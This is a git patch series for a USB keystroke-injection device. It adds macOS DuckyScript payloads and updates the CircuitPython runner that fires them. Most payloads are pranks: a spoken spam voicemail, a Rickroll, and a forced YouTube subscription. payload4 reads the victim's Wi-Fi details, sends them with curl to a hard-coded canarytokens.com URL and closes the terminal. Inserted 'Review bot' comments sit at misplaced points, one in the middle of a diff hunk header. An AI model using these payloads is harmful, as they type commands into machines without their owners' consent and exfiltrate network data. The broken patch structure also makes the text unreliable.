From 7cfb4b2b6f5d863f131699466639b019240324e0 Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:09:13 -0700
Subject: [PATCH 1/7] Add files via upload

Updated payloads to .txt instead of .dd
---
 payload.txt | 8 ++++++++
 payload1.txt | 10 ++++++++++
 payload2.txt | 9 +++++++++
 payload3.txt | 13 +++++++++++++
 payload4.txt | 8 ++++++++
 5 files changed, 48 insertions(+)
 create mode 100644 payload.txt
 create mode 100644 payload1.txt
 create mode 100644 payload2.txt
 create mode 100644 payload3.txt
 create mode 100644 payload4.txt

diff --git a/payload.txt b/payload.txt
new file mode 100644
index 0000000..97d71dc
--- /dev/null
+++ b/payload.txt
@@ -0,0 +1,8 @@
+REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka
+GUI SPACE
+DELAY 500
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=)
+ENTER
\ No newline at end of file
diff --git a/payload1.txt b/payload1.txt
new file mode 100644
index 0000000..44b338a
--- /dev/null
+++ b/payload1.txt
@@ -0,0 +1,10 @@
+REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022
+DELAY 100
+GUI SPACE
+DELAY 1000
+STRING textedit
+ENTER
+DELAY 1000
+GUI N
+DELAY 100
+STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders.
diff --git a/payload2.txt b/payload2.txt
new file mode 100644
index 0000000..603ae5b
--- /dev/null
+++ b/payload2.txt
@@ -0,0 +1,9 @@
+REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING open "https://youtu.be/dQw4w9WgXcQ"
+ENTER
+DELAY 2000
+SPACE
\ No newline at end of file
diff --git a/payload3.txt b/payload3.txt
new file mode 100644
index 0000000..cf542a6
--- /dev/null
+++ b/payload3.txt
@@ -0,0 +1,13 @@
+REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1"
+DELAY 500
+ENTER
+DELAY 4000
+TAB
+TAB
+ENTER
+ENTER
\ No newline at end of file
diff --git a/payload4.txt b/payload4.txt
new file mode 100644
index 0000000..81219f7
--- /dev/null
+++ b/payload4.txt
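Review bot: payload1.txt is the only payload whose content actually changed in the .dd-to-.txt move, yet the commit record presents the series as a pure extension change: its blob goes from 6d9045a to 44b338a (the other four new .txt files keep the hashes of the deleted .dd files), with `CTRL N` replaced by `GUI N` and the `DELAY 100` / `DELAY 1000` / `DELAY 100` lines added. That behavioural fix is invisible to anyone reading history, so it should be recorded either in the commit description or in the file itself, e.g. a second header line `REM Differs from the old payload1.dd: CTRL N -> GUI N, added DELAY lines`. The deleted payload1.dd hunk (patch 3/7) shows the old content for comparison.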
@@ -0,0 +1,8 @@
+REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 2000
+STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=)
+DELAY 500
+ENTER
\ No newline at end of file

From bdda10da07ce45fd04b9791d9cccbcab949640f8 Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:09:36 -0700
Subject: [PATCH 2/7] Delete payload.dd

---
 payload.dd | 8 --------
 1 file changed, 8 deletions(-)
 delete mode 100644 payload.dd

diff --git a/payload.dd b/payload.dd
deleted file mode 100644
index 97d71dc..0000000
--- a/payload.dd
+++ /dev/null
@@ -1,8 +0,0 @@
-REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka
-GUI SPACE
-DELAY 500
-STRING terminal.app
-ENTER
-DELAY 1000
-STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=)
-ENTER
\ No newline at end of file

From 4c6f51255449add6bf0265d9f609999ddfd7859b Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:09:47 -0700
Subject: [PATCH 3/7] Delete payload1.dd

---
 payload1.dd | 7 -------
 1 file changed, 7 deletions(-)
 delete mode 100644 payload1.dd
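Review bot: The `STRING curl ...` line hard-codes one specific canarytokens.com token URL, so anyone who flashes this payload unchanged reports their Wi-Fi details to whoever owns that token rather than to themselves, and the identifier now sits in public history. A placeholder such as `http://<YOUR_CANARY_TOKEN_URL>` together with a header line `REM Replace the canary token URL with your own before use` would make that explicit. The REM line should also state that the request is sent unencrypted over plain http, since the transmitted network information is the whole point of the payload.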
diff --git a/payload1.dd b/payload1.dd
deleted file mode 100644
index 6d9045a..0000000
--- a/payload1.dd
+++ /dev/null
@@ -1,7 +0,0 @@
-REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022
-GUI SPACE
-STRING textedit
-ENTER
-DELAY 1000
-CTRL N
-STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders.

From 363844158b9bd8adff7a231c3c9ae4a52ff8596f Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:09:59 -0700
Subject: [PATCH 4/7] Delete payload3.dd

---
 payload3.dd | 13 -------------
 1 file changed, 13 deletions(-)
 delete mode 100644 payload3.dd

diff --git a/payload3.dd b/payload3.dd
deleted file mode 100644
index cf542a6..0000000
--- a/payload3.dd
+++ /dev/null
@@ -1,13 +0,0 @@
-REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022
-GUI SPACE
-STRING terminal.app
-ENTER
-DELAY 1000
-STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1"
-DELAY 500
-ENTER
-DELAY 4000
-TAB
-TAB
-ENTER
-ENTER
\ No newline at end of file

From 4683a5cf8c89ccdf328620926da7441887a5517d Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:10:11 -0700
Subject: [PATCH 5/7] Delete payload4.dd

---
 payload4.dd | 8 --------
 1 file changed, 8 deletions(-)
 delete mode 100644 payload4.dd

diff --git a/payload4.dd b/payload4.dd
deleted file mode 100644
index 81219f7..0000000
--- a/payload4.dd
+++ /dev/null
@@ -1,8 +0,0 @@
-REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022
-GUI SPACE
-STRING terminal.app
-ENTER
-DELAY 2000
-STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=)
-DELAY 500
-ENTER
\ No newline at end of file

From d71df428fea58a8aeb8b6c8f040fbb64f671ff95 Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:10:27 -0700
Subject: [PATCH 6/7] Delete payload2.dd

---
 payload2.dd | 9 ---------
 1 file changed, 9 deletions(-)
 delete mode 100644 payload2.dd

diff --git a/payload2.dd b/payload2.dd
deleted file mode 100644
index 603ae5b..0000000
--- a/payload2.dd
+++ /dev/null
@@ -1,9 +0,0 @@
-REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022
-GUI SPACE
-STRING terminal.app
-ENTER
-DELAY 1000
-STRING open "https://youtu.be/dQw4w9WgXcQ"
-ENTER
-DELAY 2000
-SPACE
\ No newline at end of file

From 44257ed5493fe7f19de6650479e1f99c712f60c7 Mon Sep 17 00:00:00 2001
From: Skickar <40251293+skickar@users.noreply.github.com>
Date: Sat, 19 Mar 2022 04:11:38 -0700
Subject: [PATCH 7/7] Updated to use .txt payloads

switched from .dd to .txt duckyscript payloads for easier editing
---
 code.py | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/code.py b/code.py
index 227b21e..ae4fb22 100644
--- a/code.py
+++ b/code.py
@@ -2,7 +2,7 @@
 # copyright (c) 2021 Dave Bailey
 # Author: Dave Bailey (dbisu, @daveisu)
 # Nugget Fork: Kody Kinzie @skickar
-# Now It Runs One Of 4 Payloads!
+# Now It Runs One Of 5 Payloads!
 import usb_hid
 from adafruit_hid.keyboard import Keyboard
@@ -119,7 +119,7 @@ def parseLine(line):
 def injectPayload(payloadNumber):
 f = open(duckyScriptPath[payloadNumber],"r",encoding='utf-8')
- print("Running payload.dd")
+ print("Running payload.txt")
 previousLine = ""
 duckyScript = f.readlines()
 for line in duckyScript:
@@ -138,7 +138,7 @@ def injectPayload(payloadNumber):
 kbd = Keyboard(usb_hid.devices)
 layout = KeyboardLayout(kbd)
-duckyScriptPath = ["payload1.dd", "payload2.dd", "payload3.dd", "payload4.dd", "payload.dd"]
+duckyScriptPath = ["payload1.txt", "payload2.txt", "payload3.txt", "payload4.txt", "payload.txt"]
 # sleep at the start to allow the device to be recognized by the host computer
 time.sleep(.5)
@@ -153,7 +153,7 @@ print(progStatus)
 if(progStatus == True):
 # not in setup mode, inject the payload
- print("Attack Mode: Running payload.dd")
+ print("Attack Mode: Running payload.txt")
 injectPayload(4)
 print("Done")
 else:
@@ -168,4 +168,3 @@ while True:
 injectPayload(i)
 if buttons[i].rose:
 print("button",i,"released!")
-
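Review bot: `print("Running payload.txt")` in the `@@ -119` hunk is still a fixed string although the line above it opens `duckyScriptPath[payloadNumber]`, so for buttons 0–3 the log names a file that is not the one being run; `print("Running", duckyScriptPath[payloadNumber])` would report the script actually injected. The same hunk's `f = open(...)` is not inside a `with`, and `injectPayload` continues past the hunk, so I cannot see whether `f` is ever closed. The `@@ -153` message is accurate as written, because that branch always calls `injectPayload(4)`, i.e. payload.txt.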